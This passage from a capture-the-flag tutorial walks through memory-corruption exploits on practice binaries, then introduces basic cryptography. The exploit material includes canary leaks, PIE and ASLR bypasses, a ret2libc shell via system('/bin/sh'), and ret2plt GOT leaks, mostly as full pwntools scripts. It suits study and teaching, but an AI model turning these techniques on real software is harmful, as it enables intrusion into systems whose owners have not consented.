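    """Lay out: filler, canary, filler, new return address."""
    gap = RETURN_OFFSET - (CANARY_OFFSET + WORD_SIZE)  # 80 - 68 = 12
    return (
        b"A" * CANARY_OFFSET
        + struct.pack("<I", canary)
        + b"A" * gap
        + struct.pack("<I", return_address)
    )


example = build_overflow(0xe1f91c00, 0x08049245)
print(len(example))
```

The canary value in the example call is the one from the debugging session above; in a real run it has to be the freshly leaked value.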

from pwn import *

p = process('./vuln-32')

log.info(p.clean())
p.sendline(b'%23$p')

canary = int(p.recvline(), 16)
log.success(f'Canary: {hex(canary)}')

payload = b'A' * 64
payload += p32(canary)  # overwrite canary with original value to not trigger
payload += b'A' * 12    # pad to return pointer
payload += p32(0x08049245)

p.clean()
p.sendline(payload)

print(p.clean().decode('latin-1'))

64-bit

Same source, same approach, just 64-bit. Try it yourself before checking the solution.

Remember, on 64-bit the first few printf arguments are taken from registers before the stack is used, and each value is 8 bytes wide, so the offset may be different.

canary-64

Bruteforcing the Canary

This is possible on 32-bit, and sometimes unavoidable. It's not, however, feasible on 64-bit.

As you can expect, the general idea is to run the process loads and loads of times with random canary values until you get a hit, which you can differentiate by the presence of a known plaintext, e.g. flag{. This can take ages to run and is frankly not a particularly interesting challenge.
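
A quick calculation shows why the word size matters so much here. The sketch assumes, as described earlier, that the lowest byte of the canary is always 00, so only the remaining bytes are random; canary_keyspace is a made-up helper name.

```python
def canary_keyspace(pointer_bits: int) -> int:
    """Number of possible canary values when the lowest byte is fixed at 00."""
    random_bits = pointer_bits - 8
    return 2 ** random_bits


for bits in (32, 64):
    print(bits, canary_keyspace(bits))
```

Roughly 16.7 million possibilities is slow but reachable; 2**56 is not.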

PIE

Position Independent Code

Overview

PIE stands for Position Independent Executable, which means that every time you run the file it gets loaded into a different memory address. This means you cannot hardcode values such as function addresses and gadget locations without finding out where they are.

Analysis

Luckily, this does not mean it's impossible to exploit. PIE executables are based on relative rather than absolute addresses, meaning that while the locations in memory are fairly random, the offsets between different parts of the binary remain constant. For example, if you know that the function main is located 0x128 bytes after the base address of the binary, and you somehow find the location of main, you can simply subtract 0x128 from this to get the base address, and from that the addresses of everything else.
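
As a worked version of that subtraction, here is a minimal sketch. Only the 0x128 offset comes from the example; the leaked address and the offset of win are hypothetical values chosen for illustration.

```python
MAIN_OFFSET = 0x128  # offset of main from the binary base (from the example)
WIN_OFFSET = 0x1a0   # hypothetical offset of another function, e.g. win


def base_from_leak(leaked_address: int, known_offset: int) -> int:
    """Recover the load base from one leaked address and its known offset."""
    return leaked_address - known_offset


leaked_main = 0x56555128  # hypothetical runtime address of main
base = base_from_leak(leaked_main, MAIN_OFFSET)
win = base + WIN_OFFSET   # any other symbol is just base + its offset

print(hex(base), hex(win))
```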

Exploitation

So, all we need to do is find a single address and PIE is bypassed. Where could we leak this address from?

The stack of course!

We know that the return pointer is located on the stack - and much like a canary, we can use format string (or other ways) to read the value of the stack. The value will always be a static offset away from the binary base, enabling us to completely bypass PIE!

Double-Checking

Due to the way PIE randomization works, the base address of a PIE executable will always end in the hexadecimal characters 000. This is because pages are the things being randomized in memory, which have a standard size of 0x1000. Operating Systems keep track of page tables that point to each section of memory and define the permissions for each section, similar to segmentation.

Checking the base address ends in 000 should probably be the first thing you do if your exploit is not working as you expected.
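
That check is a one-liner, sketched here with the standard 0x1000 page size mentioned above. The two sample values are the base address and the leaked address from the radare2 session later in these notes.

```python
PAGE_SIZE = 0x1000


def is_page_aligned(address: int) -> bool:
    """True if the address ends in the hex digits 000."""
    return address % PAGE_SIZE == 0


print(is_page_aligned(0x565ef000))  # a plausible base address
print(is_page_aligned(0x565f01d5))  # a raw leak, not a base
```

Passing the check does not prove the base is right, since a wrong offset can still land on a page boundary, but failing it means the calculation is definitely wrong.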

Pwntools, PIE, and ROP

As shown in the pwntools ELF tutorial, pwntools has a host of functionality that allows you to really make your exploit dynamic. Simply setting elf.address will automatically update all the function and symbols addresses for you, meaning you don't have to worry about using readelf or other command line tools, but instead can receive it all dynamically.

Not to mention that the ROP capabilities are incredibly powerful as well.

PIE Bypass with Given Leak

Exploiting PIE with a given leak

The Source

pie-32

#include <stdio.h>

int main() {
    vuln();

    return 0;
}

void vuln() {
    char buffer[20];

    printf("Main Function is at: %lx\n", main);

    gets(buffer);
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Pretty simple - we print the address of main, which we can read and calculate the base address from. Then, using this, we can calculate the address of win() itself.

Analysis

Let's just run the binary to make sure it's the right one :D

$ ./vuln-32 
Main Function is at: 0x5655d1b9

Yup, and as we expected, it prints the location of main.

Exploitation

First, let's set up the script. We create an ELF object, which becomes very useful later on, and start the process.

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

Now we want to take in the main function location. To do this we can simply receive up until it (and do nothing with that) and then read it.

p.recvuntil(b'at: ')
main = int(p.recvline(), 16)

Since we received the entire line except for the address, only the address will come up with p.recvline().
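
The parsing step can be tried without a running process. The sketch below does the same thing on a raw line of output using only the standard library; parse_leak is a hypothetical helper, and the sample line is the output shown above.

```python
def parse_leak(line: bytes, marker: bytes = b"at: ") -> int:
    """Return the hex address that follows the marker on a line of output."""
    _, found, tail = line.partition(marker)
    if not found:
        raise ValueError("marker not found in output")
    # int(..., 16) accepts the value with or without a leading 0x.
    return int(tail.strip().decode(), 16)


leak = parse_leak(b"Main Function is at: 0x5655d1b9\n")
print(hex(leak))
```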

Now we'll use the ELF object we created earlier and set its base address. The sym dictionary returns the offsets of the functions from the binary base until the base address is set, after which it returns the absolute address in memory.

elf.address = main - elf.sym['main']

In this case, elf.sym['main'] will return 0x11b9; if we ran it again, it would return 0x11b9 + the base address. So, essentially, we're subtracting the offset of main from the address we leaked to get the base of the binary.

Now we know the base we can just call win().

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.sendline(payload)

print(p.clean().decode('latin-1'))

By this point, I assume you know how to find the padding length and other stuff we've been mentioning for a while, so I won't be showing you every step of that.

And does it work?

[*] 'vuln-32'
    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process 'vuln-32': pid 4617
PIE bypassed! Great job :D

Awesome!

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

p.recvuntil(b'at: ')
main = int(p.recvline(), 16)

elf.address = main - elf.sym['main']

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.sendline(payload)

print(p.clean().decode('latin-1'))

Summary

From the leaked address of main, we were able to calculate the base address of the binary. From this, we could then calculate the address of win and call it.

And one thing I would like to point out is how simple this exploit is. Look - it's 10 lines of code, at least half of which is scaffolding and setup.

64-bit

Try this for yourself first, then feel free to check the solution. Same source, same challenge.

pie-64

PIE Bypass

Using format string

The Source

pie-fmtstr

#include <stdio.h>

void vuln() {
    char buffer[20];

    printf("What's your name?\n");
    gets(buffer);
    
    printf("Nice to meet you ");
    printf(buffer);
    printf("\n");

    puts("What's your message?");

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Unlike last time, we aren't given the address of a function. We'll have to leak one with format strings.

Analysis

$ ./vuln-32 

What's your name?
%p
Nice to meet you 0xf7f6d080
What's your message?
hello

Everything's as we expect.

Exploitation

Setup

As last time, first, we set everything up.

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

PIE Leak

Now we just need a leak. Let's try a few offsets.

$ ./vuln-32 
What's your name?
%p %p %p %p %p
Nice to meet you 0xf7eee080 (nil) 0x565d31d5 0xf7eb13fc 0x1

The 3rd one looks like a binary address, so let's check the difference between the 3rd leak and the base address in radare2. Set a breakpoint somewhere after the format string leak (it doesn't really matter where).

$ r2 -d -A vuln-32 

Process with PID 5548 started...
= attach 5548 5548
bin.baddr 0x565ef000
[0x565f01c9]> db 0x565f0234
[0x565f01c9]> dc
What's your name?
%3$p
Nice to meet you 0x565f01d5

We can see the base address is 0x565ef000 and the leaked value is 0x565f01d5. Therefore, subtracting 0x11d5 from the leaked address should give us the binary base. Let's leak the value and get the base address.

p.recvuntil(b'name?\n')
p.sendline(b'%3$p')

p.recvuntil(b'you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}') # not required, but a nice check

Now we just need to send the exploit payload.

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.recvuntil('message?\n')
p.sendline(payload)

print(p.clean().decode())

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
p = process()

p.recvuntil(b'name?\n')
p.sendline(b'%3$p')

p.recvuntil(b'you ')
elf_leak = int(p.recvline(), 16)

elf.address = elf_leak - 0x11d5
log.success(f'PIE base: {hex(elf.address)}')

payload = b'A' * 32
payload += p32(elf.sym['win'])

p.recvuntil('message?\n')
p.sendline(payload)

print(p.clean().decode())

64-bit

Same deal, just 64-bit. Try it out :)

pie-fmtstr-64

ASLR

Address Space Layout Randomisation

Overview

ASLR stands for Address Space Layout Randomisation and can, in most cases, be thought of as libc's equivalent of PIE - every time you run a binary, libc (and other libraries) get loaded into a different memory address.

While it's tempting to think of ASLR as libc PIE, there is a key difference.

ASLR is a kernel protection while PIE is a binary protection. The main difference is that PIE is compiled into the binary, while the presence of ASLR depends entirely on the environment running the binary. If I compiled a binary on a machine with ASLR disabled and sent it to you, it would make no difference at all: if your system has ASLR enabled, it still applies.

Of course, as with PIE, this means you cannot hardcode values such as function addresses (e.g. system for a ret2libc).

The Format String Trap

It's tempting to think that, as with PIE, we can simply use a format string to leak a libc address and subtract a static offset from it. Sadly, we can't quite do that.

When functions finish execution, they do not get removed from memory; instead, they just get ignored and overwritten. Chances are very high that you will grab one of these remnants with the format string. Different libc versions can act very differently during execution, so a value you just grabbed may not even exist remotely, and if it does the offset will most likely be different (different libcs have different sizes and therefore different offsets between functions). It's possible to get lucky, but you shouldn't really hope that the offsets remain the same.

Instead, a more reliable way is reading the GOT entry of a specific function.

Double-Checking

For the same reason as PIE, libc base addresses always end in the hexadecimal characters 000.

ASLR Bypass with Given Leak

The Source

aslr

#include <stdio.h>
#include <stdlib.h>

void vuln() {
    char buffer[20];

    printf("System is at: %p\n", system);

    gets(buffer);
}

int main() {
    vuln();

    return 0;
}

void win() {
    puts("PIE bypassed! Great job :D");
}

Just as we did for PIE, except this time we print the address of system.

Analysis

$ ./vuln-32 
System is at: 0xf7de5f00

Yup, does what we expected.

Your address of system might end in different characters - that just means you have a different libc version.

Exploitation

Much of this is as we did with PIE.

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

Note that we include the libc here - this is just another ELF object that makes our lives easier.

Parse the address of system and calculate the libc base from that (as we did with PIE):

p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

Now we can finally ret2libc, using the libc ELF object to really simplify it for us:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

Final Exploit

from pwn import *

elf = context.binary = ELF('./vuln-32')
libc = elf.libc
p = process()

p.recvuntil(b'at: ')
system_leak = int(p.recvline(), 16)

libc.address = system_leak - libc.sym['system']
log.success(f'LIBC base: {hex(libc.address)}')

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

p.interactive()

64-bit

Try it yourself :)

aslr-64

Using pwntools

If you prefer, you could have changed the following payload to be more pwntoolsy:

payload = flat(
    'A' * 32,
    libc.sym['system'],
    0x0,        # return address
    next(libc.search(b'/bin/sh'))
)

p.sendline(payload)

Instead, you could do:

binsh = next(libc.search(b'/bin/sh'))

rop = ROP(libc)
rop.raw('A' * 32)
rop.system(binsh)

p.sendline(rop.chain())

The benefit of this is it's (arguably) more readable, but also makes it much easier to reuse in 64-bit exploits as all the parameters are automatically resolved for you.

PLT and GOT

Bypassing ASLR

The PLT and GOT are sections within an ELF file that deal with a large portion of the dynamic linking. Dynamically linked binaries are more common than statically linked binaries in CTFs. The purpose of dynamic linking is that binaries do not have to carry all the code necessary to run within them - this reduces their size substantially. Instead, they rely on system libraries (especially libc, the C standard library) to provide the bulk of the functionality. For example, each ELF file will not carry its own version of puts compiled within it - it will instead dynamically link to the puts of the system it is on. As well as smaller binary sizes, this also means the user can continually upgrade their libraries, instead of having to redownload all the binaries every time a new version comes out.

So when it's on a new system, it replaces function calls with hardcoded addresses?

Not quite.

The problem with this approach is that it requires libc to have a constant base address, i.e. be loaded in the same area of memory every time it's run, but remember that ASLR exists. Hence the need for dynamic linking. Due to the way ASLR works, these addresses need to be resolved every time the binary is run. Enter the PLT and GOT.

The PLT and GOT

The PLT (Procedure Linkage Table) and GOT (Global Offset Table) work together to perform the linking.

When you call puts() in C and compile it as an ELF executable, it is not actually puts() - instead, it gets compiled as puts@plt. Check it out in GDB:

Why does it do that?

Well, as we said, it doesn't know where puts actually is - so it jumps to the PLT entry of puts instead. From here, puts@plt does some very specific things:

If there is a GOT entry for puts, it jumps to the address stored there.
If there isn't a GOT entry, it will resolve it and jump there.

The GOT is a massive table of addresses; these addresses are the actual locations in memory of the libc functions. puts@got, for example, will contain the address of puts in memory. When the PLT gets called, it reads the GOT address and redirects execution there. If the address is empty, it coordinates with the ld.so (also called the dynamic linker/loader) to get the function address and store it in the GOT.
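
The lookup-then-resolve behaviour can be modelled in a few lines of Python. This is a toy simulation of the idea only, not how ld.so is implemented; the class name, method names and the libc address are all invented for illustration.

```python
class LazyBinder:
    """Toy model of a PLT stub consulting the GOT and resolving on first use."""

    def __init__(self, libc_symbols: dict):
        self.libc_symbols = libc_symbols  # stands in for the loaded libc
        self.got = {}                     # GOT entries filled in so far
        self.resolutions = 0              # how often the "linker" was asked

    def resolve(self, name: str) -> int:
        """Stand-in for the dynamic linker: look the symbol up and cache it."""
        self.resolutions += 1
        address = self.libc_symbols[name]
        self.got[name] = address
        return address

    def call_plt(self, name: str) -> int:
        """Return the address execution would jump to for name@plt."""
        if name in self.got:
            return self.got[name]   # entry already resolved: jump straight there
        return self.resolve(name)   # first call: resolve, store, then jump


binder = LazyBinder({"puts": 0xf7e3c460})  # hypothetical libc address of puts
first = binder.call_plt("puts")
second = binder.call_plt("puts")
print(hex(first), hex(second), binder.resolutions)
```

The second call never reaches the resolver, which mirrors why a GOT entry holds the real libc address once the function has been called.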

How is this useful for binary exploitation?

Well, there are two key takeaways from the above explanation:

Calling the PLT address of a function is equivalent to calling the function itself
The GOT contains the addresses of functions in libc, and the GOT is within the binary.

The use of the first point is clear - if we have a PLT entry for a desirable libc function, for example, system, we can just redirect execution to its PLT entry and it will be the equivalent of calling system directly; no need to jump into libc.

The second point is less obvious, but debatably even more important. As the GOT is part of the binary, it will always be a constant offset away from the base. Therefore, if PIE is disabled or you somehow leak the binary base, you know the exact address that contains a libc function's address. If you perhaps have an arbitrary read, it's trivial to leak the real address of the libc function and therefore bypass ASLR.

Exploiting an Arbitrary Read

There are two main ways that I (personally) exploit an arbitrary read. Note that these approaches will cause not only the GOT entry to be returned but everything else until a null byte is reached as well, due to strings in C being null-terminated; make sure you only take the required number of bytes.

ret2plt

A ret2plt is a common technique that involves calling puts@plt and passing the GOT entry of puts as a parameter. This causes puts to print out its own address in libc. You then set the return address to the function you are exploiting, so that it is called again and you can send a second payload that uses the leak.

# 32-bit ret2plt
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

# 64-bit
# POP_RDI is the address of a `pop rdi; ret` gadget (the first argument goes in rdi)
payload = flat(
    b'A' * padding,
    POP_RDI,
    elf.got['puts'],
    elf.plt['puts'],
    elf.symbols['main']
)

flat() packs all the values you give it with p32() and p64() (depending on context) and concatenates them, meaning you don't have to write the packing functions out all the time
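
To make the packing concrete, here is a rough standard-library stand-in for what flat() does with integers and byte strings. It is a simplified sketch, not the pwntools implementation: it takes the word size as an explicit argument instead of reading it from context, and flat_sketch is a made-up name.

```python
import struct


def flat_sketch(*items, word_size: int = 4) -> bytes:
    """Concatenate items, packing integers as little-endian words."""
    formats = {4: "<I", 8: "<Q"}
    if word_size not in formats:
        raise ValueError("word_size must be 4 or 8")
    out = b""
    for item in items:
        if isinstance(item, bytes):
            out += item                                   # raw bytes pass through
        elif isinstance(item, int):
            out += struct.pack(formats[word_size], item)  # same job as p32()/p64()
        else:
            raise TypeError(f"unsupported item: {item!r}")
    return out


print(flat_sketch(b"A" * 4, 0x08049245))
print(flat_sketch(0x401136, word_size=8))
```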

%s format string

This has the same general theory but is useful when you have limited stack space or a ROP chain would alter the stack in such a way as to complicate future payloads, for example when stack pivoting.

payload = p32(elf.got['puts'])      # p64() if 64-bit
payload += b'|'
payload += b'%3$s'                  # The third parameter points at the start of the buffer


# this part is only relevant if you need to call the function again

payload = payload.ljust(40, b'A')   # 40 is the offset until you're overwriting the instruction pointer
payload += p32(elf.symbols['main'])

# Send it off...

p.recvuntil(b'|')                   # This is not required
puts_leak = u32(p.recv(4))          # 4 bytes because it's 32-bit
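
Because the read continues until a null byte, the data that comes back usually contains more than the one GOT entry. The sketch below shows the "take only the first 4 bytes" step with the standard library; the received bytes are a hypothetical example, and first_word is a made-up helper that plays the role of u32 here.

```python
import struct


def first_word(received: bytes) -> int:
    """Unpack the first 4 bytes as a little-endian 32-bit address."""
    if len(received) < 4:
        raise ValueError("not enough bytes for a 32-bit address")
    return struct.unpack("<I", received[:4])[0]


# Hypothetical output: the puts entry, followed by the next GOT entry and a newline.
received = b"\x60\x5b\xe3\xf7\x10\x4c\xe0\xf7\n"
print(hex(first_word(received)))
```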

Summary

The PLT and GOT do the bulk of dynamic linking
The PLT resolves the actual locations in libc of the functions you use and stores them in the GOT
- The next time that function is called, the PLT jumps to the address stored in the GOT and execution resumes there
Calling function@plt is equivalent to calling the function itself
An arbitrary read enables you to read the GOT and thus bypass ASLR by calculating the libc base

Cryptography

https://ctf101.org/cryptography/overview/

Cryptography is the reason we can use banking apps, transmit sensitive information over the web, and in general protect our privacy. However, a large part of CTFs is breaking widely used encryption schemes that are improperly implemented. The math may seem daunting, but more often than not, a simple understanding of the underlying principles will allow you to find flaws and crack the code.

The word “cryptography” technically means the art of writing codes. When it comes to digital forensics, it’s a method you can use to understand how data is constructed for your analysis.

What is cryptography used for?

Uses in everyday software

Securing web traffic (passwords, communication, etc.)
Securing copyrighted software code

Malicious uses

Hiding malicious communication
Hiding malicious code

Topics

XOR
Caesar Cipher
Substitution Cipher
Vigenere Cipher
Hashing Functions
Block Ciphers
Stream Ciphers
RSA

XOR

Data Representation

Data can be represented in different bases. A character such as 'A' must be given a numerical representation in base 2 (binary) so that computers can understand it.

XOR Basics

An XOR or eXclusive OR is a bitwise operation indicated by ^ and shown by the following truth table:

A	B	A ^ B
0	0	0
0	1	1
1	0	1
1	1	0

So XOR'ing the bytes 0xA0 ^ 0x2C translates to:

1	0	1	0	0	0	0	0
0	0	1	0	1	1	0	0

1	0	0	0	1	1	0	0

0b10001100 is equivalent to 0x8C. A cool property of XOR is that it is reversible, meaning 0x8C ^ 0x2C = 0xA0 and 0x8C ^ 0xA0 = 0x2C.

What does this have to do with CTF?

XOR is a cheap way to encrypt data with a password. Any data can be encrypted using XOR as shown in this Python example:

>>> data = 'CAPTURETHEFLAG'
>>> key = 'A'
>>> encrypted = ''.join([chr(ord(x) ^ ord(key)) for x in data])
>>> encrypted
'\x02\x00\x11\x15\x14\x13\x04\x15\t\x04\x07\r\x00\x06'
>>> decrypted = ''.join([chr(ord(x) ^ ord(key)) for x in encrypted])
>>> decrypted
'CAPTURETHEFLAG'

This can be extended using a multibyte key by iterating in parallel with the data.
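
A minimal sketch of that multibyte version, working on bytes rather than strings. The function name xor_bytes and the key KEY are chosen here for illustration; itertools.cycle repeats the key for as long as there is data.

```python
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR every data byte with the key, repeating the key as needed."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(d ^ k for d, k in zip(data, cycle(key)))


plaintext = b"CAPTURETHEFLAG"
encrypted = xor_bytes(plaintext, b"KEY")
decrypted = xor_bytes(encrypted, b"KEY")  # the same call reverses the encryption

print(encrypted)
print(decrypted)
```

With a one-byte key such as b"A" this produces the same bytes as the single-key example above.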

Exploiting XOR Encryption

Single Byte XOR Encryption

Single Byte XOR Encryption is trivial to bruteforce as there are only 256 possible keys to try (255 if you ignore the key 0x00, which leaves the data unchanged).
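
One way to sketch that bruteforce is to try every key and keep the one whose output looks most like text. The scoring rule below (count lowercase letters and spaces) is a deliberately crude assumption that suits lowercase English plaintext; real challenges may need a better score or a known prefix such as flag{. All names are made up for illustration.

```python
def xor_single(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)


def score(candidate: bytes) -> int:
    """Crude text score: number of lowercase ASCII letters and spaces."""
    return sum(1 for b in candidate if b == 0x20 or 0x61 <= b <= 0x7A)


def brute_force_single_byte(ciphertext: bytes):
    """Try all 256 keys and return (key, plaintext) for the best-scoring one."""
    best_key = max(range(256), key=lambda k: score(xor_single(ciphertext, k)))
    return best_key, xor_single(ciphertext, best_key)


secret = xor_single(b"the quick brown fox jumps over the lazy dog", 0x41)
key, recovered = brute_force_single_byte(secret)
print(hex(key), recovered)
```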

Multibyte XOR Encryption

Multibyte XOR gets exponentially harder to bruteforce the longer the key is, but if the encrypted text is long enough, character frequency analysis is a viable method to find the key. Character frequency analysis means that we split the ciphertext into groups based on the number of characters in the key, so that each group was encrypted with the same key byte. These groups are then bruteforced individually, using the idea that some letters appear more frequently in English text than others.

Substitution Cipher

A Substitution Cipher is a system of encryption where different symbols substitute a normal alphabet.

Caesar Cipher/ROT 13

The Caesar Cipher or Caesar Shift is a cipher that uses the alphabet to encode texts.

CAESAR encoded with a shift of 8 is KIMAIZ, so ABCDEFGHIJKLMNOPQRSTUVWXYZ becomes IJKLMNOPQRSTUVWXYZABCDEFGH.

ROT13 is the same thing but with a fixed shift of 13. The Caesar Cipher is trivial to bruteforce because there are only 25 possible shifts.
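
The shift and the bruteforce both fit in a few lines. This sketch handles uppercase A-Z only and leaves every other character untouched; the function names are chosen here for illustration.

```python
import string


def caesar_shift(text: str, shift: int) -> str:
    """Shift each uppercase letter forward by shift places, wrapping around."""
    shifted = []
    for ch in text:
        if ch in string.ascii_uppercase:
            shifted.append(chr((ord(ch) - ord("A") + shift) % 26 + ord("A")))
        else:
            shifted.append(ch)  # leave spaces, digits and punctuation alone
    return "".join(shifted)


def all_shifts(ciphertext: str) -> list:
    """Undo every possible shift (1 to 25) and return the candidates."""
    return [caesar_shift(ciphertext, -shift) for shift in range(1, 26)]


print(caesar_shift("CAESAR", 8))
for candidate in all_shifts("KIMAIZ"):
    print(candidate)
```

Reading through the 25 candidates by eye is usually enough to spot the plaintext.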

Vigenere Cipher

A Vigenere Cipher is an extended Caesar Cipher where a message is encrypted using various Caesar-shifted alphabets.

The following table can be used to encode a message:

[Figure: Vigenere Square]

Encryption

For example, encrypting the text SUPERSECRET with CODE would follow this process:

CODE gets repeated to the length of SUPERSECRET so the key becomes CODECODECOD
For each letter in SUPERSECRET we use the table to get the Alphabet to use, in this instance row C and column S
The ciphertext's first letter then becomes U
We eventually get UISITGHGTSW

Decryption

Go to the row of the key, in this case, C
Find the letter of the cipher text in this row, in this case U
The column is the first letter of the decrypted plaintext, so we get S
After repeating this process we get back to SUPERSECRET
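
The table lookup is equivalent to adding (or subtracting) the key letter's position in the alphabet, modulo 26. The sketch below uses that arithmetic instead of the square and assumes uppercase A-Z input with no spaces; the function name vigenere is chosen here for illustration.

```python
from itertools import cycle


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Encrypt (or decrypt) uppercase text with a repeating uppercase key."""
    direction = -1 if decrypt else 1
    result = []
    for letter, key_letter in zip(text, cycle(key)):  # the key repeats as needed
        shift = ord(key_letter) - ord("A")
        position = (ord(letter) - ord("A") + direction * shift) % 26
        result.append(chr(position + ord("A")))
    return "".join(result)


ciphertext = vigenere("SUPERSECRET", "CODE")
print(ciphertext)
print(vigenere(ciphertext, "CODE", decrypt=True))
```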

Hashing Functions

Hashing functions are one-way functions that theoretically provide a unique output for every input. MD5, SHA-1, and other hashes that were once considered secure have since been found to have collisions, i.e. two different pieces of data that produce the same supposedly unique output.

String Hashing

A string hash is a number or string generated using an algorithm that runs on text or data.

The idea is that each hash should be unique to the text or data (although sometimes it isn’t). For example, the hash for “dog” should be different from other hashes.

You can use command line tools or online resources such as this one. Example:

$ echo -n password | md5
5f4dcc3b5aa765d61d8327deb882cf99

Here, “password” is hashed with different hashing algorithms:

SHA-1: 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
SHA-2: 5E884898DA28047151D0E56F8DC6292773603D0D6AABBDD62A11EF721D1542D8
MD5: 5F4DCC3B5AA765D61D8327DEB882CF99
CRC32: BBEDA74F

Generally, when verifying a hash visually, you can simply look at the first and last four characters of the string.
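If no command-line tool is at hand, the same digests can be computed with Python's standard `hashlib` module. This is a small sketch; the dictionary name `digests` is only for illustration.

```python
import hashlib

data = b"password"

# Each constructor takes bytes and hexdigest() returns lowercase hex.
digests = {
    "MD5": hashlib.md5(data).hexdigest(),
    "SHA-1": hashlib.sha1(data).hexdigest(),
    "SHA-256": hashlib.sha256(data).hexdigest(),
}

for name, value in digests.items():
    print(f"{name}: {value}")
```

Hex digests are case-insensitive, so compare them after normalizing to a single case.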

File Hashing

A file hash is a number or string generated using an algorithm that is run on text or data. The premise is that it should be unique to the text or data. If the file or text changes in any way, the hash will change.

What is it used for?

- File and data identification
- Password/certificate storage comparison

How can we determine the hash of a file? You can use the md5sum command (or similar).

$ md5sum samplefile.txt
3b85ec9ab2984b91070128be6aae25eb samplefile.txt
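A rough Python equivalent of `md5sum` is sketched below. The helper name `hash_file` and the throwaway file contents are assumptions for the demo; reading in chunks keeps memory use flat for large files such as disk images.

```python
import hashlib
import os
import tempfile

def hash_file(path, algorithm="md5", chunk_size=65536):
    """Hash a file in fixed-size chunks so it never has to fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

# Demo on a temporary file with hypothetical contents.
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"sample contents\n")
before = hash_file(tmp.name)

with open(tmp.name, "ab") as f:
    f.write(b"!")  # append a single byte
after = hash_file(tmp.name)
os.remove(tmp.name)

print(before)
print(after)  # differs from `before` because the file changed
```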

Hash Collisions

A collision is when two pieces of data or text have the same cryptographic hash. This is very rare.

What’s significant about collisions is that they can be used to crack password hashes. Passwords are usually stored as hashes on a computer since it’s hard to get the passwords from hashes.

Password to Hash

If you bruteforce by trying every possible piece of text or data, eventually you’ll find something with the same hash. Enter it, and the computer accepts it as if you entered the actual password.
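The brute-force idea can be sketched as a simple wordlist attack: hash each candidate and compare it with the stored hash. The function name `crack_md5` and the tiny wordlist are hypothetical; real attacks use far larger lists and dedicated tools.

```python
import hashlib

def crack_md5(target_hex, candidates):
    """Return the first candidate whose MD5 matches target_hex, or None."""
    target = target_hex.lower()
    for word in candidates:
        if hashlib.md5(word.encode()).hexdigest() == target:
            return word
    return None

wordlist = ["123456", "letmein", "password", "qwerty"]  # hypothetical wordlist
print(crack_md5("5F4DCC3B5AA765D61D8327DEB882CF99", wordlist))  # password
```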

Two different files on the same hard drive with the same cryptographic hash can be very interesting.

“It’s now well-known that the cryptographic hash function MD5 has been broken,” said Peter Selinger of Dalhousie University. “In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an article in which they described an algorithm that can find two different sequences of 128 bytes with the same MD5 hash.”

For example, he cited this famous pair:

Password to Hash

and

Password to Hash

Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4.

Selinger said that “the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes.”

Ben Laurie has a nice website that visualizes this MD5 collision. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedl’s Illustrated Guide. And here’s a good article from DFI News that explores the same topic.

Block Ciphers

A Block Cipher is an algorithm that is used in conjunction with a cryptosystem to package a message into evenly distributed 'blocks' which are encrypted one at a time.

Definitions

Mode of Operation: How a block cipher is applied to an amount of data that exceeds a block's size
Initialization Vector (IV): A sequence of bytes that is used to randomize encryption even if the same plaintext is encrypted
Starting Variable (SV): Similar to the IV, except it is used during the first block to provide a random seed during encryption
Padding: Padding is used to ensure that the block sizes all line up and ensure the last block fits the block cipher
Plaintext: Unencrypted text; Data without obfuscation
Key: A secret used to encrypt plaintext
Ciphertext: Plaintext encrypted with a key

Common Block Ciphers

Mode	Formulas	Ciphertext
ECB	Yi = F(PlainTexti, Key)	Yi
CBC	Yi = PlainTexti XOR Ciphertexti-1	F(Y, key); Ciphertext0 = IV
PCBC	Yi = PlainTexti XOR (Ciphertexti-1 XOR PlainTexti-1)	F(Y, key); Ciphertext0 = IV
CFB	Yi = Ciphertexti-1	Plaintext XOR F(Y, key); Ciphertext0 = IV
OFB	Yi = F(Key, Yi-1); Y0 = IV	Plaintext XOR Yi
CTR	Yi = F(Key, IV + g(i));IV = token();	Plaintext XOR Yi

Note

In this case, i represents an index over the number of blocks in the plaintext. F() is the block cipher's encryption function, and g() is the function that derives the counter value for block i.

Electronic Codebook (ECB)

ECB is the most basic block cipher mode. It simply chunks up the plaintext into blocks, encrypts each block independently, and concatenates the results into a ciphertext.

ECB Encryption ECB Decryption

Flaws

Because ECB independently encrypts the blocks, patterns in data can still be seen clearly, as shown in the ECB Penguin image below.

